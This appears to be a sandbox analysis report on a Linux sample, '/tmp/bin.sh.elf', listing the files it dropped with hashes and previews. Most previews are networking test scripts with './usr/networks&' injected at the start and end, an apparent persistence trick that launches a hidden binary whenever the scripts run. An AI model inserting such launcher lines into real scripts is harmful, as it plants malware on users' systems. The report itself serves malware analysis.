                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):10729
                                                                  Entropy (8bit):5.234277562227559
                                                                  Encrypted:false
                                                                  SSDEEP:192:lMTUQUTequHlteEKkMBiaGsAj0932IgQ3:lZruj4ifQ9
                                                                  MD5:72E76957C6C8B8401BEDC93F102DFF2C
                                                                  SHA1:CC16B914A03B7FC19080A70052F306A4D4EB4FF5
                                                                  SHA-256:FC9346B8263E4837A567D526C00B521015FCE8228D3EE23C792A8AD3D4C1F596
                                                                  SHA-512:25E94A808270DD0ADFEF745F8482BFD747F88B1944508CE3A7EFBE9E150FD71E9927954C8A08613A9A39880A3B2971DF44E583F242C091C149E1CA4F42913AD5
                                                                  Malicious:false
                                                                  Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi.}..log_debug().{..if [ "$VERBOSE" = "1" ]; then...echo "$*"..fi.}..run_cmd().{..local cmd="$*"..local out..local rc...if [ "$VERBOSE" = "1" ]; then...echo "COMMAND: $cmd"..fi...out=$(eval $cmd 2>&1)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo "$out"..fi...[ "$VERBOSE" = "1" ] && echo...return $rc.}..get_linklocal().{..local ns=$1..local dev=$2..local addr...addr=$(ip -netns $ns -6 -br addr show dev ${dev} | \..awk '{...for (i = 3; i <= NF; ++i) {....if ($i ~ /^fe80/).....print $i...}..}'..)..addr=${addr/\/*}...[ -z "$addr" ] && return 1...echo $addr...return 0.}..################################################################################.# setup and teardown..cleanup().{..local ns...for ns in h1 h2 r1 r2; do...ip netns del $ns 2>/dev/null..done.}..create_vrf().{..local ns=$1...ip -netns ${ns} link add ${VRF} type vrf table ${VRF_TABLE}..ip -netns ${ns} link set ${VRF} up..ip -netns ${ns} route add vrf ${VRF} unreac
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):49
                                                                  Entropy (8bit):4.073694027700372
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORjusVOORgn:Hn
                                                                  MD5:8BB6EDFFB7B315BB004E723523112C7C
                                                                  SHA1:28AE6BC189D31C09263C661FE1F657ACC53FA62F
                                                                  SHA-256:83D6A5A6B4BA19B9F6783B95D420A9B62DF61A7AC1D1725C0C580422C30BE4F5
                                                                  SHA-512:6A410CF23E3B40168C11641FC28440F23A966EB0069A737806885A7E1AB152A3D75CA34EB06E347926EB504842AB28E500AAC0429D3CBFCC9E1785CCF5C8E5AD
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit "$?"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):8809
                                                                  Entropy (8bit):5.131942825600482
                                                                  Encrypted:false
                                                                  SSDEEP:192:8uX+hN6arJxeYLAEiNEixEiwEpE+60jTEij8EiQTEiQ8Ewswv:oDxXu1hHXWm4A
                                                                  MD5:6409214F7DB17219ACC4BC011DF69AA7
                                                                  SHA1:CE2A3FF1CFAF0C4435E07336519C86D796FA36D0
                                                                  SHA-256:22174E276FCBAD979D3E75A334AED2B45ECFB01086FD7AA69961ECF1B498BBDE
                                                                  SHA-512:6D2D037DC5EE3682E84C8A437223264FCD7939ACE3905DB0E59D320AAA8B5AE9502C5B12A18E2B0436411D92604EFE9FB3A3D55CB5AE75F37E6689D210B1CA2E
                                                                  Malicious:false
                                                                  Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi.}..run_cmd().{..local ns..local cmd..local out..local rc...ns="$1"..shift..cmd="$*"...if [ "$VERBOSE" = "1" ]; then...printf " COMMAND: $cmd\n"..fi...out=$(eval ip netns exec ${ns} ${cmd} 2>&1)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo " $out"..fi...[ "$VERBOSE" = "1" ] && echo...return $rc.}..################################################################################.# create namespaces and interconnects..create_ns().{..local ns=$1..local addr=$2..local addr6=$3...[ -z "${addr}" ] && addr="-"..[ -z "${addr6}" ] && addr6="-"...ip netns add ${ns}...ip -netns ${ns} link set lo up..if [ "${addr}" != "-" ]; then...ip -netns ${ns} addr add dev lo ${addr}..fi..if [ "${addr6}" != "-" ]; then...ip -netns ${ns} -6 addr add dev lo ${addr6}..fi...ip -netns ${ns} ro add unreachable default metric 8192..ip -netns ${ns} -6 ro add unreachable default metric 8192...ip netns exec ${ns} sysctl -qw net.ipv4.ip_forward=1..ip n
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2423
                                                                  Entropy (8bit):5.348615674361073
                                                                  Encrypted:false
                                                                  SSDEEP:48:ZmbexK9Ike8wCqHKVc+iAtGzI9R5LnduFKFuNrM730iRi5oivcsxmz9Q:VAwCEKxiLKzWcu5uRYcsxg9Q
                                                                  MD5:9D218445D56FAC6B88E0E2E435BA2991
                                                                  SHA1:878089A1BF78B2B966AFFE6405B000ED266C3B71
                                                                  SHA-256:A6E20F1D6177071C5161DBE1979B9586C3ACE1E81A01CAEDA8DC3D1ABBAC74F0
                                                                  SHA-512:78C29745CE9CF5DB1BA2A3348DCBAA3821E78DEFA51A7890A39DFA9B2C1E42FE6DAA9E811FFA2464CC067401528AE55269A3E70B5BC95B7688B0F1DA31ADA903
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 0.fi..# Argument parsing.if [[ "$#" -lt "2" ]]; then..echo "Usage: $0 [4|6] [tcp|udp|raw|raw_hdrincl|packet|packet_dgram] <args>"..exit 1.fi..readonly IP="$1".shift.readonly TXMODE="$1".shift.readonly EXTRA_ARGS="$@"..# Argument parsing: configure addresses.if [[ "${IP}" == "4" ]]; then..readonly SADDR="${SADDR4}"..readonly DADDR="${DADDR4}".elif [[ "${IP}" == "6" ]]; then..readonly SADDR="${SADDR6}"..readonly DADDR="${DADDR6}".else..echo "Invalid IP version ${IP}"..exit 1.fi..# Argument parsing: select receive mode.#.# This differs from send mode for.# - packet:.use raw recv, because packet receives skb clones.# - raw_hdrinc: use raw recv, because hdrincl is a tx-only option.case "${TXMODE}" in.'packet' | 'packet_dgram' | 'raw_hdrincl')..RXMODE='raw'..;;.*)..RXMODE="${TXMODE}"..;;.esac..# Start of state changes: install cleanup handler.save_sysctl_mem="$(sysctl -n ${path_sysctl_mem})"..cleanup() {..ip netns del "${NS2}"..ip netns del "${NS1}"..sysctl -w -q "${pat
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):553
                                                                  Entropy (8bit):5.3899937534824
                                                                  Encrypted:false
                                                                  SSDEEP:12:9eZNLWP1k99KSjnNflg6vBZNfoEfVaf7mfFtzMK4n:2LWP1EdnNfdlQEfcf7mfXzL4
                                                                  MD5:15A4626E27E3B938F8FFDBD303D53B33
                                                                  SHA1:84F28641C199CB497995A3CE8DB5A2FCD25DC5A0
                                                                  SHA-256:0AF6B2C83FF0359431DFB094DE232EAE76F5B75451F6F676929D9AB475A21387
                                                                  SHA-512:950324F54EAC2C5342721A73404919F1D386BEDB5930DF72C0CBE72C6F6AA43EA0152542B5881F6735321E4D90D86937276FBD7F3269FC1BE181B527066FE6C2
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $ksft_skip.fi..ip link show 2>/dev/null >/dev/null.if [ $? -ne 0 ];then..echo "SKIP: Could not run test without the ip tool"..exit $ksft_skip.fi..TMP_LIST_NETDEV="$(mktemp)".if [ ! -e "$TMP_LIST_NETDEV" ];then..echo "FAIL: Cannot create a tmp file"..exit 1.fi..ip link show |grep '^[0-9]' | grep -oE '[[:space:]].*eth[0-9]*:|[[:space:]].*enp[0-9]s[0-9]:' | cut -d\ -f2 | cut -d: -f1> "$TMP_LIST_NETDEV".while read netdev.do..kci_test_netdev "$netdev".done < "$TMP_LIST_NETDEV"..rm "$TMP_LIST_NETDEV".exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):6927
                                                                  Entropy (8bit):5.245316277904996
                                                                  Encrypted:false
                                                                  SSDEEP:192:GZgLaLRutZZZY0RotZeOLeiTJPxJdErVNSPB1:0LMvy5xLB1
                                                                  MD5:71A773A1CF4C2844EC690C14DC2795D4
                                                                  SHA1:4D7F2F8656BCEE4FEC77F9CB4E48696074142753
                                                                  SHA-256:C4D2798D0A46D005EC75BB7894E220768B253C31B354A917F24B3F82D3AFF42F
                                                                  SHA-512:B8E3BA8C33648BE22E6E241E083DF708A894C57CAD36C0FB5EC5A60549928EDAE105FFEAE2011EDD83C2FC206D0A55A3EA714B7997D76160C586A8E9D32AD933
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1..elif [ $ret -eq $ksft_skip ]; then...printf "TEST: %-60s [SKIP]\n" "${tdesc}"...err_flush..fi...return $ret..)..ret=$?..case $ret in...0)....all_skipped=false....[ $exitcode=$ksft_skip ] && exitcode=0...;;...$ksft_skip)....[ $all_skipped = true ] && exitcode=$ksft_skip...;;...*)....all_skipped=false....exitcode=1...;;..esac...return $ret.}..run_test_nh() {..tname="$1"..tdesc="$2"...USE_NH=yes..run_test "${tname}" "${tdesc} - nexthop objects"..USE_NH=no.}..test_list_flush_ipv4_exception() {..setup namespaces routing || return $ksft_skip..trace "${ns_a}" veth_A-R1 "${ns_r1}" veth_R1-A \.. "${ns_r1}" veth_R1-B "${ns_b}" veth_B-R1 \.. "${ns_a}" veth_A-R2 "${ns_r2}" veth_R2-A \.. "${ns_r2}" veth_R2-B "${ns_b}" veth_B-R2...dst_prefix1="${prefix4}.${b_r1}."..dst2="${prefix4}.${b_r2}.1"...# Set up initial MTU values..mtu "${ns_a}" veth_A-R1 2000..mtu "${ns_r1}" veth_R1-A 2000..mtu "${ns_r1}" veth_R1-B 1500..mtu "${ns_b}" veth_B-R1 150
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):27705
                                                                  Entropy (8bit):5.130824667635872
                                                                  Encrypted:false
                                                                  SSDEEP:384:plueipsq4jk3JBM9M805s0/tuInWXwgs67rZB4c4LcjyVIBM0l8Xt7OQ:plj0CwtupXwgs5
                                                                  MD5:4C5823B32859398C4CF3545B601B90AD
                                                                  SHA1:1CECDD2FED9EC85D8E633DDA4266F9BB231D527C
                                                                  SHA-256:7F519C632595142674CD45BC369973D1140A098D9622A2BEA3202E086DA51F10
                                                                  SHA-512:15015A5332A8757DB8A0BBB776F18CB9F87C70FBFDCEF2FD0ADBF4E5443CB46A90FC6C43D2AC397B22A161862FBFE633E654A9B1F4C0EF588532509EC5F5E718
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.# set global exit status, but never reset nonzero one..check_err().{..if [ $ret -eq 0 ]; then...ret=$1..fi.}..# same but inverted -- used when command must fail for test to pass.check_fail().{..if [ $1 -eq 0 ]; then...ret=1..fi.}..kci_add_dummy().{..ip link add name "$devdummy" type dummy..check_err $?..ip link set "$devdummy" up..check_err $?.}..kci_del_dummy().{..ip link del dev "$devdummy"..check_err $?.}..kci_test_netconf().{..dev="$1"..r=$ret...ip netconf show dev "$dev" > /dev/null..check_err $?...for f in 4 6; do...ip -$f netconf show dev "$dev" > /dev/null...check_err $?..done...if [ $ret -ne 0 ] ;then...echo "FAIL: ip netconf show $dev"...test $r -eq 0 && ret=0...return 1..fi.}..# add a bridge with vlans on top.kci_test_bridge().{..devbr="test-br0"..vlandev="testbr-vlan1"...local ret=0..ip link add name "$devbr" type bridge..check_err $?...ip link set dev "$devdummy" master "$devbr"..check_err $?...ip link set "$devbr" up..check_err $?...ip link add link "$devb
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):656
                                                                  Entropy (8bit):4.8250605751068365
                                                                  Encrypted:false
                                                                  SSDEEP:12:LHMHDFIJQDFIJc/DFIJ0/DFIJs/DFIJH26zxGkFbwDFIJ6CDFIJJoDFIJUvDFIJm:LHMHDFIJQDFIJKDFIJCDFIJaDFIJdxjz
                                                                  MD5:53337CAEED6C138D63B0E15D58EC25D9
                                                                  SHA1:0E93369E52555A57951321A297B191ED623E513B
                                                                  SHA-256:619047CB4E304B0D3855233EA3AB615E439C64714B45BFD733E8AB9F20CBFDCD
                                                                  SHA-512:D4CA977EAD46EB46AF4B9CD78EAB3F93B2C350DBE164EAC25F9A4FFC4189562485DAABA91E50BD135B3395F6482E51F825364851E16B840960E698B399742467
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit $?.fi..set -e..tc qdisc add dev lo root fq../so_txtime -4 -6 -c mono a,-1 a,-1../so_txtime -4 -6 -c mono a,0 a,0../so_txtime -4 -6 -c mono a,10 a,10../so_txtime -4 -6 -c mono a,10,b,20 a,10,b,20../so_txtime -4 -6 -c mono a,20,b,10 b,20,a,20..if tc qdisc replace dev lo root etf clockid CLOCK_TAI delta 400000; then..! ./so_txtime -4 -6 -c tai a,-1 a,-1..! ./so_txtime -4 -6 -c tai a,0 a,0.../so_txtime -4 -6 -c tai a,10 a,10.../so_txtime -4 -6 -c tai a,10,b,20 a,10,b,20.../so_txtime -4 -6 -c tai a,20,b,10 b,10,a,20.else..echo "tc ($(tc -V)) does not support qdisc etf. skipping".fi..echo OK. All tests passed../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):51
                                                                  Entropy (8bit):4.0566141271368545
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVaUSXVOORgn:RMn
                                                                  MD5:25486302E2F79E715F71224880891FB0
                                                                  SHA1:558D33B331F487C6617CEDBDCEC691FC47647B88
                                                                  SHA-256:850754C348CF66F7EB60CD7F6C452215A466AD2A5EC5D9F64FAB9335ABF40183
                                                                  SHA-512:AB584D017C9D3A4BD2D62B6874C6AF315EC308EDA10BD38B97D704013505F7E7E1FFA1D07FA0B29E40515469E4B95D61D291A468D2353F65F2B83813631EA673
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1;.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):51
                                                                  Entropy (8bit):4.0566141271368545
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVaUSXVOORgn:RMn
                                                                  MD5:25486302E2F79E715F71224880891FB0
                                                                  SHA1:558D33B331F487C6617CEDBDCEC691FC47647B88
                                                                  SHA-256:850754C348CF66F7EB60CD7F6C452215A466AD2A5EC5D9F64FAB9335ABF40183
                                                                  SHA-512:AB584D017C9D3A4BD2D62B6874C6AF315EC308EDA10BD38B97D704013505F7E7E1FFA1D07FA0B29E40515469E4B95D61D291A468D2353F65F2B83813631EA673
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1;.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2382
                                                                  Entropy (8bit):4.741658396321069
                                                                  Encrypted:false
                                                                  SSDEEP:48:yLLMtE5wKhzJ6YbFCB9BMT4J4uGZTG/A8:ynMtE5wK9U3MT42ttGv
                                                                  MD5:E9155DD4BB8D021515B8E1FB4DF3F1D9
                                                                  SHA1:02CF9F008F0650C56BB20933DF10671487B48C32
                                                                  SHA-256:5EE5E55DBE08499E7DB792B6568D62E8ADDAD3E83301B0AA0964D7BEB04AEDE6
                                                                  SHA-512:50E24943AB337B25BF2A8817797821D0CC8F2B5081535E89C353B3E2A141F11B5671F7407102933D34A1AFA0F5F545581DC26F5296FAF08EB60B132133BB313E
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.[[ $1 == "clean" ]] && exit 0..trap cleanup EXIT..# Setup "Hypervisors" simulated with netns.ip link add veth-hv-1 type veth peer name veth-hv-2.setup-hv-networking() {. hv=$1.. ip netns add hv-$hv. ip link set veth-hv-$hv netns hv-$hv. ip -netns hv-$hv link set veth-hv-$hv name veth0.. ip -netns hv-$hv link add vrf-underlay type vrf table 1. ip -netns hv-$hv link set vrf-underlay up. ip -netns hv-$hv addr add 172.16.0.$hv/24 dev veth0. ip -netns hv-$hv link set veth0 up.. ip -netns hv-$hv link add br0 type bridge. ip -netns hv-$hv link set br0 up.. ip -netns hv-$hv link add vxlan0 type vxlan id 10 local 172.16.0.$hv dev veth0 dstport 4789. ip -netns hv-$hv link set vxlan0 master br0. ip -netns hv-$hv link set vxlan0 up.}.setup-hv-networking 1.setup-hv-networking 2..# Check connectivity between HVs by pinging hv-2 from hv-1.echo -n "Checking HV connectivity ".ip netns exec hv-1 ping -c 1 -W
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):5641
                                                                  Entropy (8bit):5.313892425850938
                                                                  Encrypted:false
